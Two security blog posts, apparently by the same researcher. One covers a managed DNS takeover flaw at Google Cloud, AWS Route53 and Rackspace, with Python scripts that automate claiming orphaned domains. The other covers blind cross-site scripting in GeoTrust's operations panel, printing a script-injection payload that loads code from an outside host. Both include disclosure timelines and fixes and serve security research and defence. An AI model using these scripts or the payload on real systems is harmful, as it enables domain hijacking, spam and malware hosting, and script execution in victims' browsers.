Recently, I found that DigitalOcean suffered from a security vulnerability in their domain import system which allowed for the takeover of 20K domain names. If you haven’t given that post a read, I recommend doing so before going through this write-up. Originally I had assumed that this issue was specific to DigitalOcean, but as I’ve now learned, this couldn’t be further from the truth. It turns out this vulnerability affects just about every popular managed DNS provider on the web. If you run a managed DNS service, it likely affects you too.

The Managed DNS Vulnerability

The root of this vulnerability occurs when a managed DNS provider allows someone to add a domain to their account without any verification of ownership of the domain name itself. This is actually an incredibly common flow and is used in cloud services such as AWS, Google Cloud, Rackspace and, of course, DigitalOcean. The issue occurs when a domain name is used with one of these cloud services and the zone is later deleted without the domain’s nameservers also being changed. This means that the domain is still fully set up for use with the cloud service but has no account with a zone file to control it. With many cloud providers, anyone can then create a DNS zone for that domain and take full control over it. This allows an attacker to set up a website, issue SSL/TLS certificates, host email, and so on for the hijacked domain. Worse yet, after combining the results from the various providers affected by this problem, over 120,000 domains were vulnerable (likely many more).

Detecting Vulnerable Domains via DNS

Detecting this vulnerability is a fairly interesting process: it can be done via a simple DNS NS query run against the target’s nameservers. If the domain is vulnerable, the nameservers will return either a SERVFAIL or REFUSED DNS error. The following is an example query using the dig DNS tool:

$ dig NS zz[REDACTED].net

; <<>> DiG 9.9.5-3ubuntu0.8-Ubuntu <<>> NS zz[REDACTED].net
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 62335
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;zz[REDACTED].net.                 IN      NS

;; Query time: 73 msec
;; SERVER: 172.30.0.2#53(172.30.0.2)
;; WHEN: Sat Sep 17 16:46:30 PDT 2016
;; MSG SIZE  rcvd: 42

The above response shows we’ve received a DNS SERVFAIL error indicating that this domain is vulnerable.

If we get a SERVFAIL response, how are we supposed to know what the actual nameservers for this domain are? Actually, dig has already found the domain’s nameservers but just hasn’t displayed them to us. DNS queries for a domain’s nameservers usually follow this process:

  • Query the DNS root nameservers for the list of nameservers belonging to the domain’s TLD (in this case, .net).
  • Query one of the nameservers for the specified TLD of the domain for the nameservers of the domain.
  • Query the nameservers just returned for the domain’s own NS records (it’s unclear why dig performs this final query, considering the answer is already known from the .net nameservers).

*Note that many of these steps will be skipped if the results are already cached by your resolver.

The last step is what causes dig to return this SERVFAIL error, so we’ll skip it and just ask the nameservers for the .net TLD directly. First we’ll find out what those are:

$ dig NS net.

; <<>> DiG 9.9.5-3ubuntu0.8-Ubuntu <<>> NS net.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 624
;; flags: qr rd ra; QUERY: 1, ANSWER: 13, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;net.                           IN      NS

;; ANSWER SECTION:
net.                    2597    IN      NS      b.gtld-servers.net.
net.                    2597    IN      NS      c.gtld-servers.net.
net.                    2597    IN      NS      d.gtld-servers.net.
net.                    2597    IN      NS      e.gtld-servers.net.
net.                    2597    IN      NS      f.gtld-servers.net.
net.                    2597    IN      NS      g.gtld-servers.net.
net.                    2597    IN      NS      h.gtld-servers.net.
net.                    2597    IN      NS      i.gtld-servers.net.
net.                    2597    IN      NS      j.gtld-servers.net.
net.                    2597    IN      NS      k.gtld-servers.net.
net.                    2597    IN      NS      l.gtld-servers.net.
net.                    2597    IN      NS      m.gtld-servers.net.
net.                    2597    IN      NS      a.gtld-servers.net.

;; Query time: 7 msec
;; SERVER: 172.30.0.2#53(172.30.0.2)
;; WHEN: Sat Sep 17 16:53:54 PDT 2016
;; MSG SIZE  rcvd: 253

Now we can query one of these nameservers for the nameservers of our target domain:

$ dig NS zz[REDACTED].net @a.gtld-servers.net.

; <<>> DiG 9.9.5-3ubuntu0.8-Ubuntu <<>> NS zz[REDACTED].net @a.gtld-servers.net.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 3529
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 2, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;zz[REDACTED].net.                 IN      NS

;; AUTHORITY SECTION:
zz[REDACTED].net.          172800  IN      NS      dns1.stabletransit.com.
zz[REDACTED].net.          172800  IN      NS      dns2.stabletransit.com.

;; ADDITIONAL SECTION:
dns1.stabletransit.com. 172800  IN      A       69.20.95.4
dns2.stabletransit.com. 172800  IN      A       65.61.188.4

;; Query time: 9 msec
;; SERVER: 192.5.6.30#53(192.5.6.30)
;; WHEN: Sat Sep 17 16:54:48 PDT 2016
;; MSG SIZE  rcvd: 129

Now we can see that the nameservers for this domain are dns1.stabletransit.com and dns2.stabletransit.com and can target this set of nameservers specifically.

In order to find a list of domains vulnerable to this issue I used my copies of the zone files for the .com and .net TLDs, which are available from Verisign (you have to apply to get access). These zone files contain a list of every .com and .net domain name along with the nameservers they use. Using this data we can find all domains which are hosted by a specific cloud provider, because their nameservers will be that provider’s. Once we have a list for a specific provider we can use a small Python script to query each domain and probe for the SERVFAIL or REFUSED DNS errors. Finally, we use the cloud management panel to see if we can add these domains to our account, confirming the vulnerability exists.
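To make that probing step concrete, the following is a minimal checker sketch using dnspython 2.x; the domain and nameserver IP are placeholders, and note that dnspython surfaces SERVFAIL/REFUSED answers from every queried server as a NoNameservers exception:

import dns.resolver

def zone_missing(domain, provider_ns_ip):
    """Ask a provider nameserver directly for the domain's NS records.

    A SERVFAIL/REFUSED response suggests the provider hosts no zone for
    the domain, i.e. anyone may be able to claim it.
    """
    resolver = dns.resolver.Resolver(configure=False)
    resolver.nameservers = [provider_ns_ip]
    try:
        resolver.resolve(domain, "NS")
        return False  # Got an answer: a zone exists for this domain.
    except dns.resolver.NoNameservers:
        return True   # All queried servers answered SERVFAIL/REFUSED.
    except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN):
        return False

# Hypothetical usage against a provider nameserver IP:
print(zone_missing("zz-example.net", "173.245.58.51"))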

Google Cloud DNS (~2.5K Domains Affected, Patched)

Google’s Cloud offering includes a managed DNS service which has an easy import process for new domains. Documentation for doing so can be found here. The general process is the following (an automation sketch follows the list):

  • Go to the DNS management panel of your Google Cloud account: https://console.cloud.google.com/networking/dns
  • Click the “+ Create Zone” button.
  • Create a new zone with any name and a “DNS Name” of the vulnerable domain.
  • Click the “Create” button to create this new zone.
  • Note the list of nameservers that have been returned to you. In this example I received the following:

[Screenshot: the nameservers returned by Google Cloud]
  • Check if the nameservers match the target nameservers, if they don’t just delete the zone and try again.
  • Once you’ve finally gotten a matching list of nameservers you now have full control of the DNS for that domain.
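If you wanted to automate that create/check/delete loop, a rough sketch using the legacy google-cloud-dns Python client might look like the following; the project, domain, and target nameserver set are placeholders, and the exact client calls should be treated as assumptions rather than a tested implementation:

from google.cloud import dns

# Hypothetical target delegation, read off the victim domain's NS records.
TARGET_NS = {"ns-cloud-e%d.googledomains.com." % i for i in range(1, 5)}

client = dns.Client(project="my-project")  # assumes default credentials

attempt = 0
while True:
    attempt += 1
    zone = client.zone("takeover-%d" % attempt, dns_name="zz-example.net.")
    zone.create()
    if set(zone.name_servers or []) >= TARGET_NS:
        print("Matching nameserver set after %d attempts" % attempt)
        break
    zone.delete()  # Wrong set returned; discard the zone and roll again.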

Disclosure & Remediation Timeline

  • Sep 9, 2016: Reported issue to Google bug bounty program, provided a list of vulnerable domains as well.
  • Sep 9, 2016: Report triaged by Google Security Team.
  • Sep 9, 2016: Vulnerability confirmed, internal bug filed for the issue.
  • Sep 13, 2016: Reward of $1,337 awarded, donation matching available if given to a charity.
  • Sep 14, 2016: Requested the reward be given to the Tor Project (making the donation $2,674). Received a Tor hoodie/swag :) from the Tor folks – thanks guys/gals!

Amazon Web Services – Route53 (~54K Domains Affected, Multiple Mitigations Performed)

Amazon’s managed DNS service is called Route53. They have a number of nameservers, randomly returned to you, which are distributed across multiple domains and TLDs. Previously I thought this was to defend against this specific type of vulnerability; however, since they are vulnerable, I now believe it was done more to ensure uptime in the case of a TLD experiencing DNS issues.

The takeover process for Route53 is complicated by the fact that they have a wide range of nameservers which can be returned to you. However, the following process allows you to take over a target domain in just a few minutes. In order to automate this process I wrote a small Python proof-of-concept script (a sketch appears below) which would create and delete Route53 zones until the proper nameservers were returned. One unique property of this vulnerability for Route53 was that you could get just one of the target’s nameservers returned to you, instead of all four in a set like other managed DNS providers. This turns out to be just fine from an exploitation standpoint: you can simply keep any zone that contains one correct nameserver (and three incorrect ones) and keep creating zones until you have a handful of zones which, between them, contain each of the target’s nameservers. Then you can replicate your DNS records across these four zones to set DNS for the target.

The process for this is as follows:

  • Use the AWS Route53 API to create a new zone for a target domain.
  • Check the resulting nameservers that were returned for this zone, if any of the nameservers match the target’s nameservers then keep the zone and remove it from the list of targeted nameservers. The following is an example of the nameservers returned for a domain:

[Screenshot: the nameservers returned for a Route53 zone]

  • If none are shared with the target nameserver set, delete the zone.
  • Keep repeating this process until your zones collectively contain all of the target’s vulnerable nameservers.
  • Now just create the DNS record you’d like for the target domain across all zones.

The following is a redacted example of creating four zones for a target domain, each zone containing just one of the target’s nameservers:

[Screenshot: four Route53 zones, each containing one of the target’s nameservers]

Using this method we can reliably take over any of these 54K domains.
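For reference, a minimal boto3 sketch of that zone-churning loop is below; the domain is a placeholder, the target nameservers reuse the example delegation shown later in this post, and a real run would need rate-limit and error handling:

import uuid
import boto3

route53 = boto3.client("route53")

domain = "zz-example.net"  # hypothetical vulnerable domain
# Target delegation as pulled from the TLD nameservers (placeholders).
remaining_ns = {"ns-624.awsdns-14.net", "ns-39.awsdns-04.com",
                "ns-1651.awsdns-14.co.uk", "ns-1067.awsdns-05.org"}
kept_zones = []

while remaining_ns:
    zone = route53.create_hosted_zone(
        Name=domain,
        CallerReference=str(uuid.uuid4()),  # must be unique per request
    )
    returned = {ns.rstrip(".") for ns in zone["DelegationSet"]["NameServers"]}
    matched = returned & remaining_ns
    if matched:
        kept_zones.append(zone["HostedZone"]["Id"])  # keep this zone
        remaining_ns -= matched
    else:
        route53.delete_hosted_zone(Id=zone["HostedZone"]["Id"])

print("Zones covering the target delegation:", kept_zones)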

Disclosure & Remediation Timeline

  • Sep 5, 2016: Contacted AWS security using PGP, describing the full scope of the issue and attaching a list of vulnerable domains.
  • Sep 5, 2016 (less than an hour from first contact): Response from AWS stating they will investigate immediately and follow up as soon as they know more.
  • Sep 5, 2016: Responded to the team, apologizing for contacting them on Labor Day and thanking them for the quick response time.
  • Sep 7, 2016: Contacted by Zack from the AWS security team, requesting a call to talk more about the issue and understand a disclosure strategy.
  • Sep 7, 2016: Responded confirming that Sep 8 works for a call to discuss.
  • Sep 8, 2016: Call with AWS to discuss the vulnerability and plans to alert affected customers and remediation of the issue.
  • Oct 7, 2016: Follow-up call with someone from the Route53 team discussing Amazon’s remediation strategy and next steps. Their plan was three-pronged: reach out to affected customers, add a warning when deleting a zone in the console, and publish documentation on the risks of leaving stale nameserver delegations.

All of the above steps were indeed taken by Amazon. You now get the following warning when you delete a zone in Route53:

[Screenshot: the Route53 zone deletion warning]

If you are an AWS customer using Route53, be sure to read this documentation about the risks of not changing your domain’s nameservers after deleting a zone from your account.

Disclosure notes: Overall this team was awesome to do disclosure with; they were super helpful and cared deeply about getting a proper fix in place. The response in less than an hour on Labor Day (late at night, too) was crazy to see – very impressed. Great job guys :), I wish all disclosures were like this.

Rackspace (~44K Domains Affected, Won’t Fix)

Rackspace offers a Cloud DNS service which is included free with every Rackspace account. Unlike Google Cloud and AWS Route53, there are only two nameservers (dns1.stabletransit.com and dns2.stabletransit.com) for their cloud DNS offering, so no complicated zone creation/deletion process is needed. All that needs to be done is to enumerate the vulnerable domains and add them to your account. The steps are the following (a scripted sketch follows the list):

  • Under the Cloud DNS panel, click the “Create Domain” button and specify the vulnerable domain and a contact email and TTL.
  • Now simply create whatever DNS records you’d like for the taken-over domain.
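Since the nameservers are fixed, bulk-adding a list of candidate domains is trivial to script against Rackspace’s Cloud DNS API. A rough sketch follows; the v1.0 endpoint and payload shape are recalled from the public API docs of the era, so treat them as assumptions:

import requests

TOKEN = "..."       # auth token from the Rackspace identity service
ACCOUNT = "123456"  # hypothetical account/tenant ID
API = "https://dns.api.rackspacecloud.com/v1.0/%s/domains" % ACCOUNT

def try_takeover(domain):
    # Attempt to add the (possibly unclaimed) domain to our account.
    payload = {"domains": [{
        "name": domain,
        "emailAddress": "hostmaster@" + domain,
        "ttl": 300,
    }]}
    resp = requests.post(API, json=payload,
                         headers={"X-Auth-Token": TOKEN})
    return resp.ok

for candidate in ["zz-example.net"]:  # hypothetical vulnerable list
    print(candidate, try_takeover(candidate))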

This can be done for any of the 44K domain names to take them over. Rackspace does not appear to be interested in patching this (see below), so if you are a Rackspace customer please ensure you properly remove Rackspace’s nameservers from your domain when you migrate it away.

Disclosure & Remediation Timeline

  • Sep 9, 2016: Reported vulnerability to the Rackspace security team, included a list of vulnerable domains.
  • Sep 12, 2016: Rackspace responds with the following:

    “Thank you for your submission. We have taken it under advisement and will contact you if we require any additional information. For the protection of our customers, Rackspace does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches, fixes, or releases are available. Rackspace usually distributes security disclosures and notifications through blog posts and customer support portals.

    Please do not post or share any information about a potential security vulnerability in any public setting until we have researched, responded to, and addressed the reported vulnerability and informed customers, if needed. Our products are complex, and reported security vulnerabilities will take time to investigate, address, and fix.

    While we sincerely appreciate reports for vulnerabilities of all severity levels, we will include your name on our website at http://www.rackspace.com/information/legal/rsdp if you report a previously unknown vulnerability, which Rackspace has determined to be of a high or critical severity, or in cases where there has been continued research or other contributions made by the person.

    Thanks and have a great day.”

  • Sep 14, 2016: Due to the previous email seeming to state that they won’t confirm the issue until a full investigation occurs, I asked that they notify me when remediation has occurred so I can properly coordinate releasing the vulnerability information to the general public.
  • Oct 7, 2016: Due to a lack of response from vendor, notified them that a 90-day responsible disclosure timeline would be observed with a disclosure occurring regardless of a patch.
  • Nov 7, 2016: Pinged Rackspace (no response as of yet) notifying them that disclosure will occur in 30 days.
  • Dec 5, 2016: Received the following response from Rackspace:

    “Thank you again for your work to raise public awareness of this DNS issue. We’ve been aware of the issue for quite a while. It can affect customers who don’t take standard security precautions when they migrate their domains, whether those customers are hosted at Rackspace or at other cloud providers.

    If a customer intends to migrate a domain to Rackspace or any other cloud provider, he or she needs to accomplish that migration before pointing a domain registrar at that provider’s name servers. Otherwise, any customer of that provider who has malicious intentions could conceivably add that domain to his or her account. That could allow the bad actor to effectively impersonate the domain owner, with power to set up a website and receive email for the hijacked domain.

    We share multiple articles about DNS both on the Rackspace Support Network (https://support.rackspace.com/) and in the Rackspace Community (https://community.rackspace.com/). Our Acceptable Use Policy (http://www.rackspace.com/information/legal/aup) prohibits activities like this. Our support teams also work directly with customers to help them take the simple steps necessary to secure their domains.

    We appreciate your raising public awareness of this issue and are always glad to work with you.

    Sincerely,

    The Rackspace DNS Team”

Disclosure notes: Responsible disclosures that affect a large number of vendors usually take a full 90 days because one vendor drags their feet until the very end. In this case it appears Rackspace is that vendor. Their policy, specifically the following: “Rackspace does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches, fixes, or releases are available.” does not instill confidence that anything is being done to address reported security vulnerabilities. To not confirm or discuss a reported security vulnerability until after remediation is a very odd approach, and it’s unclear why such a policy would ever be in place. One would hope that all of the initial reports they receive are 100% clear in explanation, since they cannot ask any questions until after remediation of said unclear vulnerability has occurred. Additionally, the final response seems to be to the effect of “we write many articles about DNS; also, if a customer doesn’t properly remediate this issue they will be vulnerable, but it is against our AUP to exploit it”. This puts extra importance on raising awareness, since Rackspace does not appear interested in issuing a fix for this issue.

DigitalOcean (~20K Domains Affected)

For the full write-up on how this issue affected DigitalOcean, please see this post.

Remediation Recommendation

Different cloud providers took different approaches to this issue. My recommendation for remediation is fairly straightforward:

  • User adds the domain to their account via the cloud management panel.
  • At this time the cloud provider returns a random list of nameservers for the domain owner to point their domain to, for example:
    • a-nameserver-one.example.com
    • a-nameserver-two.example.com
    • a-nameserver-three.example.com
  • The cloud provider now continually queries the TLD’s nameservers for the list of nameservers that the domain has been set to. Once the user has set their nameservers properly the cloud provider stores the list of nameservers and the domain in a database.
  • For any future zones created for this domain the cloud provider will only return nameservers which do not match the stored list of nameservers. This means that in order to use a newly created zone the domain owner will have to set their domain’s nameservers to a new nameserver set, ensuring that only the domain owner can actually carry out this action.
  • The cloud provider will continually query the TLD nameservers to see if the domain’s nameservers have changed to the new set and will store the results in a database as we did in step 3.

The above method does add a bit of friction to the process of re-creating a zone for a domain, but it completely prevents this issue from occurring. Since the friction is only equivalent to that of the initial domain import process it doesn’t seem too unreasonable, but it is possible that providers won’t want to inconvenience customers this way.
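As a concrete illustration, the core of the scheme is just set disjointness between the nameservers being handed out and every set previously verified for the domain. A minimal sketch, with hypothetical pool and storage structures:

import random

def nameservers_for_new_zone(domain, nameserver_pools, verified_sets):
    # Only hand out a delegation set that shares no nameserver with any
    # set previously verified at the TLD for this domain (as described in
    # the list above), forcing the real owner to re-delegate.
    used = set()
    for ns_set in verified_sets.get(domain, []):
        used |= set(ns_set)
    candidates = [pool for pool in nameserver_pools
                  if not (set(pool) & used)]
    if not candidates:
        raise RuntimeError("no unused delegation set available")
    return random.choice(candidates)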

Usefulness to Attackers

The attack scenario for this vulnerability can be split into two separate groups, targeted and un-targeted. Depending on the end goal of an attacker, either one could be chosen.

Targeted Attack

In the targeted use case you have an attacker who wants to take over a specific domain or list of domains belonging to their victim. In this case an attacker would set up a script to continually perform NS queries against the nameservers of the domains that they are targeting. The script detects when it receives a SERVFAIL or REFUSED DNS error and immediately attempts to allocate the target’s nameservers upon detecting that no zone exists for the domain. Many different mistakes on the domain owner’s part could cause the zone to be deleted, such as the cloud provider removing the zone due to lack of payment, the company changing providers, etc.
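Such a watcher is only a few lines on top of the zone_missing() checker sketched earlier in this post; the domains and provider IP below are placeholders:

import time

WATCHED = ["victim-site.com", "victim-mail.net"]  # hypothetical targets
PROVIDER_NS_IP = "173.245.58.51"                  # e.g. ns1.digitalocean.com

while True:
    for domain in WATCHED:
        if zone_missing(domain, PROVIDER_NS_IP):  # from the earlier sketch
            print(domain + " appears unclaimed - attempt zone creation now")
    time.sleep(30)  # the takeover window may only be minutes long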

Un-Targeted Attack

The more likely attack scenario, in my opinion, would be an attacker who is merely interested in clean domains to be used for malware and spam campaigns. Since many threat intelligence services will rate a domain based on its age, length of registration, and cost to register, there is a big advantage to hijacking existing domains over registering new ones. In addition to the hijacked domains often having past history and a long age, they also have WHOIS information which points to real people unrelated to the person carrying out the attack. If an attacker launches a malware campaign using these domains, it will be harder to pinpoint who or what is carrying out the attack, since the domains would all appear to be regular domains with no observable pattern other than the fact that they all use cloud DNS. It’s an attacker’s dream: troublesome attribution and an endless number of names to use for malicious campaigns.

Conclusion

This vulnerability is a systemic issue which affects all major managed DNS providers. It is very likely that more providers, not mentioned here, are affected as well. All managed DNS providers are encouraged to check their own implementations for this issue and to patch and notify customers as soon as possible.

Until next time,

-mandatory


This is a continuation of a series of blog posts which cover blind cross-site scripting (XSS) and its impact on the internal systems which suffer from it. Previously, we’ve shown that data entered into one part of a website, such as the account information panel, can lead to XSS on internal account-management panels. This was the case with GoDaddy, the Internet’s largest registrar. Today we will be showing off a vulnerability in one of the Internet’s certificate authorities which allows us to get a rare peek inside of their internals.

One of the Best Disclosure Experiences in a Long Time

Before we start I would like to call out the awesome responsible disclosure experience I had with Symantec (the owner of GeoTrust). To be honest, I had incredibly low expectations before I contacted them, but the person I talked with (Mike) was super helpful and made the experience completely painless. They had no problem using PGP, kept me updated with the status of the bug, and gave me a tracking ID for the vulnerability – all signs of a mature disclosure program. Finally, they even took action to ensure that the entire code base was scrubbed for other XSS vulnerabilities, which actually took me aback with its level of proactiveness. While the security community seems to now hate vendors if they don’t reward $50,000 for every security issue, I still really appreciate companies working with researchers even if no reward is involved. The security advisory for this vulnerability has also been posted to their website and can be found here.

What is a Certificate Authority?

For those unfamiliar with the inner workings of SSL/TLS, the entire system works based off of trusting a few certificate authorities (CAs). These certificate authorities have the power to mint intermediate certificate authorities, which can then mint certificates for websites looking to protect their communications with SSL/TLS. All of these certificate authorities are embedded in your web browser by default, which gives them this power. This system means that certificate authorities can sell this service, as is the case with GeoTrust, or offer it for free, as is the case with Let’s Encrypt. In order for an attacker to intercept communications to these websites, they must have access to a trusted CA, or an intermediary CA created by a trusted CA, which is already embedded in the user’s browser. Mozilla, the creator of the Firefox web browser, keeps a simple list of certificate authorities that are trusted in Firefox by default here. One of the important responsibilities of certificate authorities is to ensure that only the true owners of websites are allowed to issue certificates for them. This is to ensure that malicious actors don’t get a valid certificate for a website that they do not own (such as google.com, etc.). If a certificate authority fails to carry out this duty properly it risks being removed from all modern web browsers. This was the case with the certificate authority DigiNotar, which was breached and used to issue improper SSL/TLS certificates for Gmail, allowing the Iranian government to spy on its citizens. Browser vendors reacted by removing DigiNotar from their trust stores, meaning that all certificates issued by this certificate authority were no longer trusted and would throw an SSL error when used. In the end, this led to the Dutch government taking over the company and, ultimately, bankruptcy for DigiNotar.

Discovering the Vulnerable GeoTrust Operations Dashboard

Originally, I wasn’t looking for a vulnerability in GeoTrust at all; I simply wanted to obtain a trusted SSL/TLS certificate with my XSS Hunter payloads in some of the certificate fields, using various certificate authorities. This was an attempt to enumerate vulnerabilities in systems which scan the Internet for these certificates and index them. However, during my testing I found an unintended vulnerability in GeoTrust’s Operations Panel when a support agent viewed my certificate request information. I woke up one morning with an XSS Hunter payload fire email titled [XSSHunter] XSS Payload Fired On https://ops.geotrust.com/opsdashboard/com.geotrust.presentation.app.ops.services.cancelagedorders.CancelAgedOrders/CancelAgedOrders.jsp in my inbox with the following screenshot attached:

[Screenshot: the GeoTrust operations panel, partially redacted]

The above screenshot is partially redacted to respect the privacy of GeoTrust’s customers (and the agent viewing the page). However, the red highlighted portion shows the location of the XSS payload which had fired.

In the above screenshot there appears to be a “Vetting” portion to this operations panel. Likely this is for manual “vetting” of those requesting certificates. I’ll leave the possible security implications of this up to the reader. However, I was not able to verify its purpose since I didn’t want to overstep my boundaries in any way.

So what code made this page vulnerable? Let’s take a closer look.

Better Context, Better Understanding

Since our XSS Hunter probe collects the vulnerable page’s DOM, we can investigate the page’s JavaScript source code to attempt to discover the cause of this vulnerability. In this case the root cause appeared to be a function named getOrders. The code for this function is the following:

function getOrders() {

    // get the form values
    var dateInput = $('#date2').datepicker( "getDate" );
    var range1 = $('#from').datepicker( "getDate" );
    var range2 = $('#to').datepicker( "getDate" );

    dateInput = $.datepicker.formatDate('@', dateInput);
    range1 = $.datepicker.formatDate('@', range1);
    range2 = $.datepicker.formatDate('@', range2);

    var curr = new Date();

    if((curr - range2) < 86400000){
           alert("Cannot cancel orders less than 21 days old")
    }else{

        if($('input[name=searchRadio]:checked').val() == "byDate"){
                range1 = 0;
                range2 = dateInput;
        }

        range1 = range1.toString();
        range2 = range2.toString();

        $.ajax({
            type: "GET",
            dataType: "json",
            url: "/opsdashboard/CancelAgedOrdersServlet",
            data: "range1=" + range1 + "&range2=" + range2 + "&cancel=false",
            success: function(data, textStatus, XMLHttpRequest){
                var table = "<table border=\"1\" cellpadding=\"3\" cellspacing=\"0\" align=\"center\"><tr><td bgcolor=\"pink\">" +
                                "Order ID</td><td bgcolor=\"pink\">Product Name</td><td bgcolor=\"pink\">Customer Name" +
                                "</td><td bgcolor=\"pink\">Order Date</td><td bgcolor=\"pink\">Order State</td></tr>";
                var count = data.length;
                var i;
                if(count==0){
                    alert('No orders to retrieve');
                     $('#getOrdersDiv').show();
                }
                else if(count==1 && data[0].RecordsOverflow == "true"){
                    alert('Too many records retrieved, please reduce date range.');
                     $('#getOrdersDiv').show();
               }
                else{
                for(i = 0; i < count; i++){
                    table = table + "<tr><td>" + data[i].ID + "</td><td>" + data[i].Product +
                    "</td><td>" + data[i].Customer + "</td><td>" + (data[i]).Date +
                    "</td><td>" + data[i].State + "</td></tr>";
                }

                table = table + "</table>";
                $('#grid').html(table);
                $('#grid').show();
                $('#cancels').show();
            }

            },
            error: function(XMLHttpRequest, textStatus, errorThrown){
                alert('No orders to retrieve');
                $('#getOrdersDiv').show();
            }
        });
    }
}

The above code shows that the HTML table seen in the screenshot is created by concatenating HTML with order information retrieved from a JSON endpoint /opsdashboard/CancelAgedOrdersServlet. The relevant lines are the following:

for(i = 0; i < count; i++){
    table = table + "<tr><td>" + data[i].ID + "</td><td>" + data[i].Product +
    "</td><td>" + data[i].Customer + "</td><td>" + (data[i]).Date +
    "</td><td>" + data[i].State + "</td></tr>";
}

The order ID, product name, customer name, date, and state are all concatenated into each row of the HTML table. When going through the free-trial certificate sign-up process, the customer name I provided was the following:

"><script src=https://y.vg></script>

Once the JavaScript code runs on my input, it creates a row with the following HTML:

<tr><td>13785664</td><td>GeoTrust SSL Trial</td><td>"><script src="https://y.vg"></script</td><td>06/06/2016 05:40:04</td><td>Waiting for Whois Approval</td></tr>

Finally, the entire HTML blob is inserted into the DOM with the following line:

$('#grid').html(table);

This causes the injected markup to be written into the page, firing our XSS payload.

String concatenation is one of the most common ways for XSS vulnerabilities to occur, and this is no exception. The important thing to note in this example is that we are able to determine the root cause of the vulnerability with ease due to the amount of contextual information collected by our XSS Hunter payloads. This makes communicating the root issue much easier and has in the past even led to vendors becoming concerned that I had actually logged in as an internal agent (though not in this specific case). In the world of blind payload testing, context is everything. You may only trigger the vulnerability a single time, so you must have as much information as possible if you want to get it fixed.
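For completeness, the general fix is to encode every attacker-influenced field before it touches markup (in the page’s jQuery, building cells with .text() instead of concatenating into .html()). A sketch of the encoding step, written in Python to match the other examples in this post, using the standard library’s html.escape:

import html

def render_row(order):
    # Build one table row with every field HTML-encoded.
    cells = (order["ID"], order["Product"], order["Customer"],
             order["Date"], order["State"])
    return ("<tr>"
            + "".join("<td>%s</td>" % html.escape(str(c)) for c in cells)
            + "</tr>")

# A hostile customer name now renders inert:
print(render_row({"ID": 13785664, "Product": "GeoTrust SSL Trial",
                  "Customer": '"><script src=https://y.vg></script>',
                  "Date": "06/06/2016 05:40:04", "State": "Pending"}))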

Exploitation During Remediation

Shortly after discovering this vulnerability I reached out to the Symantec security team to disclose it. After a quick exchange of PGP keys, the team received the vulnerability report, confirmed they understood the issue, and told me they would work on getting in contact with the appropriate product team.

A few days after this had occurred I woke up to yet another payload fire email, this time the title was the following:

[XSSHunter] XSS Payload Fired On https://stage1-ops.geotrust.symclab.net/opsdashboard/com.geotrust.presentation.app.ops.services.cancelagedorders.CancelAgedOrders/CancelAgedOrders.jsp

Attached was the following screenshot:

[Screenshot: payload fire on the Symantec staging instance]

The above screenshot requires less redaction because it is filled with test data, this being a staging instance. Apparently the product team that received the vulnerability report decided to use the same payload in staging as in production. Over the following days I received a few more payload fires from the same IP addresses:

[XSSHunter] XSS Payload Fired On file:///C:/Users/sachin_[REDACTED_LAST_NAME]/Desktop/iFrame.html

[XSSHunter] XSS Payload Fired On https://ft1-ops.geotrust.symclab.net/opsdashboard/com.geotrust.presentation.app.ops.services.cancelagedorders.CancelAgedOrders/CancelAgedOrders.jsp

Humorously, the first email had the following screenshot attached:

[Screenshot: payload fire from a local HTML file on the developer’s desktop]

The DOM contents were the following:

<html><head></head><body><header>Hello</header>
 
<iframe src="https://stage2-products.geotrust.symclab.net/orders/rapidssl.do?ref=454848RAP60985"></iframe>
 
"> (S "><table title="Click to Verify - This site chose Symantec SSL for secure e-commerce and confidential communications." border="0" cellpadding="2" cellspacing="0" width="135">
<tbody><tr>
<script>alert(1)</script><script src="https://y.vg"></script>
</tr></tbody></table>
</body></html>

It appeared one of the product team members was attempting to analyse the payload. The “Hello” made me wish I could’ve sent a response. So if you’re Sachin and you’re reading this post…hi! After receiving a few of these payload fires I reached back out to Symantec to let them know that the product team was testing with my payload. They communicated this to the team and I stopped receiving them shortly after.

The above occurrence points out another interesting angle of using blind cross-site scripting payloads. Since you are alerted of all payload fires, an attacker can not only learn about the XSS vulnerabilities themselves but also find out when someone is investigating the payload. This gives the attacker advance warning that someone is looking into their activities.

In addition to early warning, it shows that a developer’s first instincts can also be quite dangerous. The User-Agent of the developer who opened a local HTML file indicated that he was using Firefox 46 on Windows 7. The browser being used is important because file:// URIs are treated very differently depending on the browser. Firefox, for example, allows you to use XMLHttpRequest to retrieve files which are in the same directory or lower on the file system. This means that had I been malicious, I could have written a payload to enumerate and send me files off of the developer’s hard drive (assuming they were in the same or a lower directory than the fired .html payload file). Since this file was opened from the developer’s Desktop, the payload could’ve stolen everything else located there as well (what do you have on your desktop?). What started out as an XSS vulnerability in a website has now become a vulnerability which can exfiltrate files from a developer’s computer.

Final Thoughts

From this case study we’ve learned a lot about the precarious nature of blind XSS testing. If you are interested in testing for these types of vulnerabilities yourself, you can sign up for an account on the XSS Hunter website. If you don’t trust me or want to run your own version you can get a copy of the source code on Github.

Disclosure Timeline

  • July 7th: XSS payload fire email received indicating the GeoTrust Operations Panel was vulnerable.
  • July 7th: Email sent to [email protected] – bounce message received.
  • July 7th: Sent vulnerability report to [email protected] instead after discovering Symantec owns GeoTrust.
  • July 8th: Received response from Mike at Symantec with a PGP key for encrypting the vulnerability details.
  • July 8th: Responded with PGP-encrypted vulnerability report.
  • July 8th: Vulnerability is confirmed by Mike and he states that he will reach out to the relevant team to get it fixed.
  • July 14th: Reached back out to Symantec to alert them that the product team is using the https://y.vg payload in staging testing.
